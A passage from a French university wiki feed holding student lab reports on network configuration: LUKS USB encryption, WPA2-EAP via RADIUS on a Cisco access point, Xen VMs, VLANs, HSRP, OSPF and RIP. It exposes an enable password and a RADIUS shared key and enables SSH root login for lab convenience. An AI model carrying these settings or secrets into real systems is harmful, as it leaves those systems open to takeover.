On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model &lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key secretIMA5SC&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid Mycoplasma&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;br /&gt;
    ap(config-ssid)#mbssid Guest-mode&lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0&lt;br /&gt;
   ap(config-if)#mbssid&lt;br /&gt;
   ap(config-if)#encryption vlan 102 mode ciphers aes-ccm tkip&lt;br /&gt;
   ap(config-if)#ssid &lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0.2&lt;br /&gt;
   ap(config-subif)#encapsulation dot1Q 102&lt;br /&gt;
   ap(config-subif)#bridge-group 102&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52170</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52170"/>
				<updated>2020-01-30T10:08:30Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
